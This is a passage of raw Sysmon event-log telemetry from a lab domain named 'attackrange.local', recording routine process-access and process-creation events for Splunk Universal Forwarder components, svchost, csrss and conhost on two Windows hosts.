Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060941Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.930{7F8C56E7-51A7-6063-1C01-00000000AF01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060940Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.242{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6928D5E5646FB3BC0C0026849319DFAD,SHA256=7C1B03B14B9618D7FB50E7AD1E18FE5B3169288E5B6AA2125D1CBEBCD7BE438F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245666Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.675{CB4067E1-51A7-6063-AE22-00000000AF01}2092908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245665Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A7-6063-AE22-00000000AF01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245664Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245663Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245662Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245661Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245660Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245659Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245658Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245657Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245656Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245655Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-51A7-6063-AE22-00000000AF01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245654Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.550{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A7-6063-AE22-00000000AF01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245653Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.551{CB4067E1-51A7-6063-AE22-00000000AF01}2092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245652Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.347{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F7EF0952DB041F17972D84543AF8CAD,SHA256=776C2FDFD901140ABE95BEA8BCEDC4A6A4A066DAB3E82AD5FF47FCC1A5F11717,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245651Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:23.253{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C40BBF9590F1400308BBD1D57E0FF5F,SHA256=AC505B1C8F9436D691E4AA17F5788FE4195FF83FD1FE88C9DB250E0E3CE9F949,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060959Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.742{7F8C56E7-51A8-6063-1D01-00000000AF01}60402656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060958Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6A7302A703F3704A99D92A8E1DE9195,SHA256=B268745CB1B14549339B293AF80100A9A7F38353F199F22EFC760B820C05ABCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060957Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A8-6063-1D01-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060956Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060955Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060954Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060953Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060952Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-51A8-6063-1D01-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060951Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.617{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A8-6063-1D01-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060950Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.618{7F8C56E7-51A8-6063-1D01-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060949Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:24.054{7F8C56E7-51A7-6063-1C01-00000000AF01}57724748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 